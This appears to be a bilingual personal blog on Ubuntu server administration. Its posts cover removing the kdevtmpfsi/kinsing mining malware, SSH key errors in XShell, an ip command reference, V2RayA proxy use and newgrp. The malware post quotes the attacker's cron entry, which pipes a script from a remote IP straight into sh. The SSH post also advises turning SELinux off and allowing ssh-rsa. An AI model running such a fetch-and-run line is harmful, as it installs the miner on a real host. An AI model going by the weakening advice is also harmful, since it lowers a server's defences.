发布于

How to Fix the kdevtmpfsi and kinsing Mining Virus Infection on an Ubuntu Server

My server is running Ubuntu 24. Today, after installing and configuring a WordPress blog based on Nginx 1.24, PHP 8.3, and MySQL 8.0, I ran the following command to check the server load:

$ top -i

I noticed that the kdevtmpfsi process was using 100% of the CPU. A quick search revealed that this is a malicious mining process. Typically, two malicious mining processes—kdevtmpfsi and kinsing—are found together. Here’s how I resolved the issue:

Step 1: Kill the kdevtmpfsi and kinsing Processes

First, find the process ID (PID) for kdevtmpfsi and kill it:

$ ps aux | grep kdevtmpfsi | awk '{print $2}' | xargs sudo kill -9

Next, find the PID for kinsing and kill it:

$ ps aux | grep kinsing | awk '{print $2}' | xargs sudo kill -9

Step 2: Find and Remove the Malicious Program Files

Now, search for and remove any files associated with kdevtmpfsi and kinsing:

$ sudo find / -iname kdevtmpfsi* -exec rm -fv {} \;
$ sudo find / -iname kinsing* -exec rm -fv {} \;

The output should look like this:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

Step 3: Check for Scheduled Tasks Set by www-data User

The top -i command showed that the user running the kdevtmpfsi process was www-data, so I checked the scheduled tasks for this user:

$ sudo crontab -l -u www-data

I found the following task:

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

This cron job downloads and executes the unk.sh script, which in turn downloads and runs the kdevtmpfsi and kinsing programs. To remove this scheduled task, I ran:

$ sudo crontab -r -u www-data

Then, I deleted the unk.sh script:

$ sudo find / -iname unk.sh -exec rm -fv {} \;

Step 4: Create Non-Executable Placeholder Files for kdevtmpfsi and kinsing

To prevent the kdevtmpfsi and kinsing files from being executed again, I created them as non-executable placeholder files and set them to read-only:

$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsing

This ensures that these files are no longer executable and cannot run.

Step 5: Enable UFW Firewall and Block Malicious IP

I enabled the UFW firewall and blocked access from the IP address 185.122.204.197, which was being used for the malicious downloads:

$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https
$ sudo ufw deny from 185.122.204.197

To check the UFW status:

$ sudo ufw status numbered

Step 6: Restrict PHP-FPM to Localhost

According to online resources, this issue is likely due to the php-fpm service exposing port 9000 to the internet. To fix this, I edited the php-fpm configuration file:

$ sudo vim /etc/php/8.3/fpm/pool.d/www.conf

I changed the following line:

listen = 9000

to:

listen = 127.0.0.1:9000

This restricts php-fpm to only listen on the local 127.0.0.1 IP address. To apply the changes, I restarted the php-fpm service:

$ sudo systemctl restart php8.3-fpm

Reference:

发布于

Ubuntu服务器感染了挖矿病毒程序kdevtmpfsi和kinsing的解决方法

我的服务器的操作系统是Ubuntu 24。今天安装并配置了Wordpress博客,基于Nginx 1.24 + PHP 8.3 + MySQL 8.0。我运行以下命令查看服务器负载:
$ top -i
发现kdevtmpfsi进程CPU使用率达到100%。网上查了一下,说它是恶意的挖矿进程。一般同时存在两个恶意的挖矿进程:kdevtmpfsi和kinsing。解决步骤如下。

第一步,查找kdevtmpfsi进程的id并杀死:
$ ps aux | grep kdevtmpfsi | awk '{print $2}' | xargs sudo kill -9
查找kinsing进程的id并杀死:
$ ps aux | grep kinsing | awk '{print $2}' | xargs sudo kill -9

第二步,使用以下命令查找并删除kdevtmpfsi和kinsing进程对应的程序文件:

$ sudo find / -iname kdevtmpfsi* -exec rm -fv {} \;
$ sudo find / -iname kinsing* -exec rm -fv {} \;

输出应如下所示:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

第三步,top -i命令显示运行kdevtmpfsi进程的用户是www-data用户,因此查看www-data用户设置的计划任务:

$ sudo crontab -l -u www-data
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

果然有,这个计划任务的功能是每隔一定时间就下载并运行unk.sh脚本程序,这个脚本程序会下载kdevtmpfsi和kinsing程序并启动运行。删除www-data用户的计划任务:
$ sudo crontab -r -u www-data
删除unk.sh脚本文件:
$ sudo find / -iname unk.sh -exec rm -fv {} \;

第四步,创建自己的kdevtmpfsi和kinsing文件并将其设置为只读:

$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsing

这么做后kdevtmpfsi和kinsing文件就不是可执行程序了,就无法运行起来了。

第五步,启动UFW防火墙并禁止185.122.204.197这个IP对我当前的服务器的访问:

$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https
$ sudo ufw deny from 185.122.204.197

查看UFW状态:
$ sudo ufw status numbered

根据网上的资料,这个问题很可能是php-fpm服务暴露9000端口到互联网引起的,因此修改php-fpm配置文件:
$ sudo vim /etc/php/8.3/fpm/pool.d/www.conf
把以下这行:
listen = 9000
改为:
listen = 127.0.0.1:9000
意思是php-fpm服务只监听本机127.0.0.1这个IP地址。重启php-fpm服务使配置文件的修改生效:
$ sudo systemctl restart php8.3-fpm

参考
https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu

发布于

在Ubuntu上安装nginx

环境
Ubuntut 22桌面版

如果在安装nginx之前已经安装了apache2,那么80端口已经被apache2监听了,使用以下命令停止apache2服务:
sudo systemctl stop apache2

使用以下命令禁止apache2开机自动启动:
sudo systemctl disable apache2

由于apache2和nginx默认的网站根目录都是/var/www/html/,因此成功安装和启动nginx后,在操作系统内部的火狐浏览器访问:
http://localhost
访问到了apache2的欢迎页面,不要惊讶,因为nginx在/var/www/html/目录安装的是index.nginx-debian.html。我们可以执行以下命令备份apache2安装的index.html:
sudo mv /var/www/html/index.html /var/www/html/index.apache2-ubuntu22.html
然后把index.nginx-debian.html改名为index.html:
sudo mv /var/www/html/index.nginx-debian.html /var/www/html/index.html
这样再访问http://localhost就能访问到nginx的欢迎页面了!

Ubuntu安装nginx后,默认没有创建nginx用户和组(在CentOS系统是创建nginx用户和组),而是创建www-data用户和组。

发布于

Ubuntu24安装PHP8.3的方法

首先更新系统:

sudo apt update && sudo apt upgrade -y

Ubuntu 24执行以下命令即可安装php8.3:

sudo apt install php -y

安装完成后,检查php的版本:

php --version

使用sudo apt install php8.3-PACKAGE_NAME命令安装php常用扩展,把PACKAGE_NAME替换为具体的扩展名:

sudo apt install -y php8.3-cli php8.3-common php8.3-fpm php8.3-mysql php8.3-zip php8.3-gd php8.3-mbstring php8.3-curl php8.3-xml php8.3-bcmath php8.3-sqlite3 php8.3-intl php8.3-bz2 php8.3-imagick php8.3-redis

查看已经安装了哪些php扩展:

php -m

参考

Ubuntu22安装PHP8.2的方法
发布于

How to Fix the Error “The Selected User Key is Not Registered on the Remote Host. Please Try Again” When Using XShell with SSH Private Key to Log into a Remote Linux Host

I’m working with a remote Linux host running Ubuntu 24.

Following an online tutorial, I was able to successfully SSH into the remote host using a private key file from Git Bash with the following command:

$ ssh [email protected] -i .ssh/id_rsa

However, when I try using the same command and private key file in XShell, I get the error: “The selected user key is not registered on the remote host. Please try again.”

Upon checking the SSH log file /var/log/auth.log, I found the following message:

userauth_pubkey: signature algorithm ssh-rsa not in PubkeyAcceptedAlgorithms [preauth]

This indicates that the SSH service on the remote host rejected the SSH-RSA public key signature algorithm during authentication, likely because it has been disabled in the remote host’s configuration.

The reason it worked in Git Bash but not in XShell is likely because Git Bash uses a newer version of the OpenSSH client that supports alternative signature algorithms (like rsa-sha2-256 or rsa-sha2-512). On the other hand, XShell may still rely on the ssh-rsa signature algorithm due to its default configuration or older client version, which results in the authentication failure.

Starting from OpenSSH 8.8, the ssh-rsa algorithm is considered insecure, and some server configurations (like Ubuntu 24) disable it by default. In this case, the PubkeyAcceptedAlgorithms configuration on the remote host may have disabled ssh-rsa, only accepting more secure algorithms such as rsa-sha2-256 or rsa-sha2-512.

To check my remote Linux host’s OpenSSH version, I ran:

$ sshd -V
OpenSSH_9.6p1 Ubuntu-3ubuntu13.5, OpenSSL 3.0.13 30 Jan 2024

It turned out to be OpenSSH 9.6.

This version of OpenSSH supports more secure public/private key pairs generated with the ECDSA (Elliptic Curve Digital Signature Algorithm). To fix the issue with XShell, I decided to regenerate a new key pair using the ECDSA algorithm. XShell provides a “New User Key Generation Wizard” under the “Tools (T)” menu to do this.

Alternative Solution: Allow ssh-rsa Algorithm (if the remote host allows it)

If you have control over the remote host, you can allow the ssh-rsa algorithm by modifying the SSH configuration file /etc/ssh/sshd_config on the remote host. Here’s how you can do it:

1 Open the SSH configuration file:

sudo vim /etc/ssh/sshd_config

2 Find and add (or modify) the following line to allow ssh-rsa:

PubkeyAcceptedAlgorithms +ssh-rsa

3 Restart the SSH service:

sudo systemctl restart ssh

If you’re using CentOS, restart sshd instead:

sudo systemctl restart sshd

Other Causes for the Error “The Selected User Key is Not Registered on the Remote Host” or “Server Refused the User Key”

1 Incorrect directory or file permissions: Ensure that the permissions for the .ssh directory and the authorized_keys file are set correctly:

chmod 700 .ssh
chmod 600 .ssh/authorized_keys

Also, ensure that authorized_keys is owned by the correct user:

chown ubuntu:ubuntu .ssh/authorized_keys

2 Incorrect key: Make sure the authorized_keys file on the server contains the public key (usually ending with .pub), not the private key.

3 SSH key authentication not enabled: The configuration file /etc/ssh/sshd_config should have the following line and it should not be commented out:

PubkeyAuthentication yes

4 Username and key mismatch: If the key is in /home/debian/.ssh/ (for the debian user), but you’re trying to log in as ubuntu, authentication will fail.

5 Root login is disabled: If /etc/ssh/sshd_config has PermitRootLogin no, you won’t be able to log in as root.

6 SELinux is enabled: Run getenforce to check the status of SELinux. The status should be Permissive, not Enforcing. Temporarily disable SELinux with:

setenforce 0

To permanently disable SELinux, edit the /etc/sysconfig/selinux file and change SELINUX=enforcing to SELINUX=disabled.

7 Incorrect authorized_keys filename: If the line in /etc/ssh/sshd_config is:

# AuthorizedKeysFile .ssh/authorized_keys

but your .ssh directory contains a file named authorized_key, you should rename it to authorized_keys.

发布于

XShell使用私钥文件ssh登录远程Linux主机报错“所选的用户秘钥未在远程主机上注册,请再试一次”的解决方法

我的远程Linux主机的操作系统是Ubuntu 24。

按照网上的教程,我在Git Bash上使用私钥文件成功ssh登录远程Linux主机,命令如下所示:

$ ssh [email protected] -i .ssh/id_rsa

但是使用同样的命令和私钥文件,却无法在XShell上ssh登录远程Linux主机,报错“所选的用户秘钥未在远程主机上注册。请再试一次”。

查看ssh的日志文件/var/log/auth.log,我发现如下信息:

userauth_pubkey: signature algorithm ssh-rsa not in PubkeyAcceptedAlgorithms [preauth]

这表明远程主机的 SSH 服务在进行公钥认证时,发现客户端使用的公钥签名算法是 ssh-rsa,但是在远程主机的配置中,ssh-rsa算法被禁用了,因此认证失败。

在Git Bash 中使用私钥可以登录成功,可能是因为 Git Bash 使用的是较新的 OpenSSH 客户端版本,并能够使用备用的签名算法(如 rsa-sha2-256 或 rsa-sha2-512)。但是在 XShell 中,可能由于其默认配置或旧版本的客户端,它仍然依赖于 ssh-rsa 签名算法进行身份验证,导致认证失败。

从 OpenSSH 8.8 开始,ssh-rsa 算法被视为不再安全,部分服务器配置(例如Ubuntu 24)默认禁用了该算法。在远程主机的 SSH 服务中,可能已经通过 PubkeyAcceptedAlgorithms 配置来禁用 ssh-rsa 算法,而只接受更安全的算法,例如 rsa-sha2-256 或 rsa-sha2-512。 查看我的远程Linux主机的OpenSSH版本:

$ sshd -V
OpenSSH_9.6p1 Ubuntu-3ubuntu13.5, OpenSSL 3.0.13 30 Jan 2024

发现是OpenSSH 9.6版本。

OpenSSH 9.6版本支持更安全的ECDSA(Elliptic Curve Digital Signature Algorithm) 算法生成的公钥和私钥。因此我解决XShell问题的方法是,使用ECDSA算法重新生成一对公钥和私钥,可以使用XShell的“工具(T)”->“新建用户秘钥生成向导”来做到:

另一个解决方案是,允许 ssh-rsa 算法(如果远程主机允许)。如果你有对远程主机的控制权,可以通过修改远程主机的 SSH 配置文件 /etc/ssh/sshd_config 来允许 ssh-rsa 算法。打开 /etc/ssh/sshd_config 文件:

sudo vim /etc/ssh/sshd_config

查找并添加(或修改)以下行,允许 ssh-rsa 算法:

PubkeyAcceptedAlgorithms +ssh-rsa

重启 SSH 服务:

sudo systemctl restart ssh

# 如果你的系统是CentOS

sudo systemctl restart sshd

其他会引起“所选的用户秘钥未在远程主机上注册。请再试一次”或“服务器拒绝了用户密钥”问题的原因还有:

1 没有正确设置目录和文件的权限:

chmod 700 .ssh

chmod 600 .ssh/authorized_keys

并且authorized_keys文件要归属于用户组,例如:

chown ubuntu:ubuntu .ssh/uthorized_keys

2 密钥错误:服务器上的 authorized_keys 保存的应是公钥(一般以.pub作为文件后缀名),而不是私钥。

3 未开启密钥验证:/etc/ssh/sshd_config这个配置文件中应有 PubkeyAuthentication yes 这一行,且没有被注释掉

4 用户名和密钥不匹配:假设密钥是放在 /home/debian/.ssh/ 下(即用户是 debian),但是登录的用户名却使用ubuntu

5 root用户名被禁止登陆:假设etc/ssh/sshd_config 配置了 PermitRootLogin no,却用 root 账户来登录

6 开启了SELinux:使用getenforce命令查看SELinux的状态,状态应该是Permissive,不能是 Enforcing。临时关闭SELinux:

setenforce 0

永久关闭SELinux的方法是:编辑/etc/sysconfig/selinux配置文件,把其中的 SELINUX=enforcing 替换为 SELINUX=disabled

7 SSH 配置文件/etc/ssh/sshd_config中有这么一行:

# AuthorizedKeysFile      .ssh/authorized_keys

而你的.ssh目录下的对应文件的名字却是authorized_key,应该是authorized_keys。

发布于

ip Command: Manage IP Addresses, Network Devices, Routing Tables, and Network Namespaces

Overview

The ip command in Linux is a powerful utility for managing IP addresses, network interfaces, routing tables, and network namespaces. It provides granular control over various network configurations, making it an essential tool for system administrators.

Syntax

ip addr add|del IFADDR dev IFACE | show|flush [dev IFACE] [to PREFIX]
ip route list|flush|add|del|change|append|replace|test ROUTE
ip link set IFACE [up|down] [arp on|off] [multicast on|off] \
        [promisc on|off] [mtu NUM] [name NAME] [qlen NUM] [address MAC] \
        [master IFACE | nomaster] [netns PID]
ip tunnel add|change|del|show [NAME] \
        [mode ipip|gre|sit] [remote ADDR] [local ADDR] [ttl TTL]
ip neigh show|flush [to PREFIX] [dev DEV] [nud STATE]
ip rule [list] | add|del SELECTOR ACTION

Key Features and Examples

Manage IP Addresses

View IP addresses:

ip addr

Add an IP address to a device:

ip addr add 192.168.1.1/24 dev eth0

Remove an IP address:

ip addr del 192.168.1.1/24 dev eth0

Flush all IP addresses for a device:

ip addr flush dev eth0

Manage Network Devices

Display all network interfaces:

ip link

Show specific device details:

ip link show dev eth0

Bring an interface up or down:

ip link set eth0 up
ip link set eth0 down

Set MTU for a device:

ip link set eth0 mtu 1450

Add or delete a bridge device:

ip link add br0 type bridge
ip link del br0

Create a virtual Ethernet pair:

ip link add veth0 type veth peer name veth1

Manage Routing Tables

Display the main routing table:

ip route show table main

Add a default route:

ip route add default via 10.8.1.1 dev eth0

Add a static route:

ip route add 10.8.1.0/24 via 10.8.1.1

Replace an existing route:

ip route replace 10.8.1.0/24 dev eth0

Flush the routing table:

ip route flush cache

Manage Routing Rules

Show routing rules:

ip rule

Add a rule to use a specific table:

ip rule add from 10.8.1.0/24 table 520

Blackhole traffic from a specific source:

ip rule add from 0/0 blackhole

Manage Network Namespaces
List network namespaces:

ip netns

Create a network namespace:

ip netns add s1

Delete a namespace:

ip netns del s1

Execute a command within a namespace:

ip netns exec s1 ip addr

Example: Setting MTU

MTU (Maximum Transmission Unit) defines the maximum packet size for data transmission on a network device. Adjusting MTU impacts performance and compatibility.

View the current MTU for eth0:

ip link show eth0

Set MTU to 1450 bytes:

ip link set eth0 mtu 1450

Common MTU Values:

  • Ethernet: 1500 bytes (default)
  • PPPoE: 1492 bytes (8 bytes for headers)
  • Wi-Fi: Often 1500 bytes but can vary slightly.

Quick Tips with ip

Color-coded output:

ip -c addr
ip -c route

Compact display:

ip -brief link
ip -brief addr

For detailed configuration guides, check the official documentation.

发布于

ip命令管理IP地址、网络设备、路由表和路由规则、网络命名空间

功能说明:在Linux系统中,ip命令用于管理IP地址、网络设备、路由表和路由规则、网络命名空间。

语  法:

ip addr add|del IFADDR dev IFACE | show|flush [dev IFACE] [to PREFIX]

ip route list|flush|add|del|change|append|replace|test ROUTE

ip link set IFACE [up|down] [arp on|off] [multicast on|off]

        [promisc on|off] [mtu NUM] [name NAME] [qlen NUM] [address MAC]

        [master IFACE | nomaster] [netns PID]

ip tunnel add|change|del|show [NAME]

        [mode ipip|gre|sit] [remote ADDR] [local ADDR] [ttl TTL]

ip neigh show|flush [to PREFIX] [dev DEV] [nud STATE]

ip rule [list] | add|del SELECTOR ACTION

参  数:

# 辅助参数

ip -n s1 addr 在网络命名空间中执行 ip addr

ip -c link 彩色显示接口

ip -c addr 彩色显示IP地址

ip -c route 彩色显示路由

ip -brief link 简洁显示接口

ip -brief addr 简洁显示地址

ip -brief -c link 彩色简洁显示接口

# ip addr管理IP地址

ip addr 查看IP地址

ip addr add 192.168.1.1/24 dev eth0 给指定设备添加IP地址

ip addr del 192.168.1.1/24 dev eth0 删除指定设备的地址

ip addr flush dev eth0 删除指定设备的所有IP地址

# ip link管理网络设备

ip link 显示所有网络接口

ip link show dev eth0 显示指定设备的信息

ip link set eth0 up 把 eth0 接口设备开启

ip link set eth0 down 把 eth0 接口设备关闭

ip link set eth0 mtu 1450 设置设备的 MTU

ip link add br0 type bridge 添加一个网桥设备

ip link del br0 删除一个网桥设备

ip link set eth0 master br0 把 eth0 添加到网桥 br0

ip link set eth0 nomaster 从网桥中删除 eth0

ip link add veth0 type veth peer name veth1 添加虚拟以太网设备

ip link set veth0 netns s1 把 veth0 移动到网络命名空间

ip link set veth1 netns s2 把 veth1 移动到网络命名空间

ip link set veth0 netns 1 把设备移动到全局网络命名空间

# ip route管理路由表

ip route 显示主路由表

ip route show table [local|main|default|num] 显示路由表

ip route show table main 显示主路由表

ip route show table 520 显示编号为 520 的路由表

ip route get 8.8.8.8 查询一个地址经过的路由

ip route get 8.8.8.8 mark 666 查询经过的路由(带标记)

ip route add default via 10.8.1.1 dev eth0 添加默认路由

ip route add 10.8.1.0/24 via 10.8.1.1 添加静态路由

ip route add 10.8.1.0/24 dev eth0 添加直连路由

ip route add 10.8.1.0/24 dev eth0 metric 10 添加带有 metric 的直连路由

ip route add 10.8.1.0/24 dev eth0 table 520 添加路由到编号 520 的路由表

ip route add table 520 10.8.1.0/24 dev eth0 另一种写法,突出表名

ip route delete 10.8.1.0/24 via 10.8.1.1 删除静态路由

ip route replace 10.8.1.0/24 dev eth0 替换路由

ip route flush cache 路由表立即生效

ip route flush table 520 清空编号为 520 的路由表

# 显示当前定义了哪些路由表

ip route show table all | grep -Eo ‘table [^ ]+ ‘ | sort | uniq

# ip rule管理路由规则

ip rule 显示路由规则

ip rule add table 520 所有包走一下 520 路由表

ip rule add from 0/0 lookup 520 所有包走一下 520 路由表

ip rule add from 0/0 table 520 同上

ip rule add from 0/0 blackhole 所有包丢弃

ip rule add from 0/0 prohibit 所有包拒绝,通信被管理员禁止

ip rule add from 0/0 unreachable 返回 network unreachable

ip rule del table 520 删除所有包走 520 路由表的规则

ip rule add from 10.8.1.0/24 table 520 来自特定网络的包走 520 路由表

ip rule add to 10.8.2.0/24 table 521 发往某网络的包走 521 路由表

ip rule add fwmark 588 table 520 标记为 588 的包走 520 路由表

ip rule add not fwmark 588 table 51820 没有标记为 588 的包走该路由表

ip rule add from 8.8.3.2/32 tos 10 table 2 来自特定 IP 且 TOS 为 10 的包

ip rule add prio 100 fwmark 1 lookup 100 优先级 100 的规则

# ip netns管理网络命名空间

ip netns 显示网络命名空间

ip netns add s1 创建一个网络命名空间

ip netns del s1 删除一个网络命名空间

ip netns attach NAME PID 改变进程网络命名空间

ip netns exec s1 command 在网络命名空间中执行命令

ip netns exec s1 ip link set lo up 在网络命名空间中设置 lo 设备

ip netns identify 查看当前进程的网络命名空间

ip netns identify PID 查看指定进程的网络命名空间

ip netns pids NAME 查看网络命名空间中的进程

ip -n s1 addr add 192.168.64.1/24 dev veth0 在网络命名空间中添加地址

   例:

1 设置MTU

MTU(Maximum Transmission Unit)是最大传输单元的缩写,表示网络中单个数据包在传输过程中能够承载的最大字节数。简单来说,MTU定义了在网络设备上(如网卡、路由器等)单次能够发送的最大数据量。

为什么MTU很重要?

  • 网络性能:较大的MTU可以提高网络传输效率,减少网络分片的发生。但如果MTU设置过大,可能导致某些网络设备无法处理,从而造成数据包丢失或传输失败。
  • 数据包分片:如果发送的数据包超过了MTU的限制,数据包就需要被分片,分片后每个小的数据包会分别发送到目标设备并重新组装。过多的分片会增加网络开销,降低性能。
  • 兼容性:不同的网络设备和协议可能对MTU有不同的要求,设置不当可能导致网络不兼容或丢包。

你可以使用以下命令来查看当前网络设备eth0的 MTU 设置:

ip link show eth0

设置网络设备 eth0 的 MTU 为 1450 字节:

ip link set eth0 mtu 1450

这意味着 eth0 网络接口上通过的每个数据包不能超过 1450 字节。如果某个应用程序尝试发送更大的数据包,网络协议栈就会将其拆分成多个小包进行发送。

常见网络的MTU值

  • 以太网(Ethernet):默认的MTU值通常是 1500 字节。
  • PPPoE(Point-to-Point Protocol over Ethernet):通常 MTU 为 1492 字节,因为额外的 8 字节用于标头。
  • Wi-Fi:通常与以太网相同,也为 1500 字节,但某些无线网络可能因为协议开销而略低。

参考

https://github.com/skywind3000/awesome-cheatsheets/blob/master/tools/ip.txt

发布于

Ubuntu操作系统桌面版使用V2RayA翻墙

V2RayA的安装和配置,见官方文档https://v2raya.org/docs/prologue/introduction/

我的操作系统是Ubuntu 22,安装的V2RayA的版本是2.2.6.2。

V2RayA翻墙节点启动后,我能使用火狐浏览器成功访问到goole.com。

V2RayA翻墙节点启动后,在操作系统后台运行,即使我们重启浏览器或重启操作系统,它依旧是在运行着的。

有时候我们在终端下载安装一些国外的软件包,由于GFW原因,网速非常慢,很久都下载不下来,那么Ubuntu的终端如何使用v2rayA翻墙?

停止V2RayA的翻墙节点后,在终端运行以下命令:

$ wget www.google.com
--2024-11-08 01:25:07--  http://www.google.com/
正在解析主机 www.google.com (www.google.com)... 31.13.94.36, 2001::1
正在连接 www.google.com (www.google.com)|31.13.94.36|:80...

发现连不上谷歌。 启动V2RayA的翻墙节点后,再次在终端运行以下命令:

$ wget www.google.com
--2024-11-08 01:27:41--  http://www.google.com/
正在解析主机 www.google.com (www.google.com)... 31.13.94.36, 2001::1
正在连接 www.google.com (www.google.com)|31.13.94.36|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 未指定 [text/html]
正在保存至: ‘index.html’

index.html                                              [ <=>                                                                                                                ]  21.11K  --.-KB/s    用时 0.002s

2024-11-08 01:27:41 (11.7 MB/s) - ‘index.html’ 已保存 [21612]

可见,成功连接到谷歌并下载了谷歌的主页到index.html文件!上述实验说明,只要我们成功启动了V2RayA的翻墙节点,Ubuntu的终端也能借助V2RayA进行翻墙!

如果你启动了V2RayA的翻墙节点后,火狐浏览器能成功访问到goole.com,但是在终端运行wget www.google.com命令连不上谷歌,也许你应该在Ubuntu操作系统的设置->网络->网络代理中手动配置代理,如下图所示:

其中20171是V2RayA默认使用的http代理端口,20170是V2RayA默认使用的socks5代理端口。

发布于

newgrp: Changing the Current User’s Group

Overview:
newgrp is a command used to change the group associated with the current user. It allows the user to switch to a different group, affecting file permissions and other operations. This command operates within the context of the currently logged-in user, meaning it cannot be used to change the group for other users.

Syntax:

newgrp [group_name]

Details:
newgrp works similarly to the login command. It allows the user to log in again under the same account but with a different group. The primary effect of running newgrp is that it switches the user’s effective group to the specified one, which will influence operations such as file access permissions.
If no group is specified, newgrp logs the user into the default group associated with the user’s username.
To use newgrp to switch groups, the user must be a member of the specified group. Otherwise, access to that group will be denied. Once a user has switched groups via newgrp, they can revert to their original group by using the exit command to close the current shell session.

Parameters:

  • group_name: The name of the group to switch to.

Example:
To add a user to the docker group:

$ sudo usermod -aG docker username

Replace username with the actual username. To add the current user to the docker group, run:

$ sudo usermod -aG docker $USER

After adding the user to the docker group, a re-login or system restart is required for the changes to take effect. Alternatively, use the following command to reload the user’s group memberships without logging out:

$ newgrp docker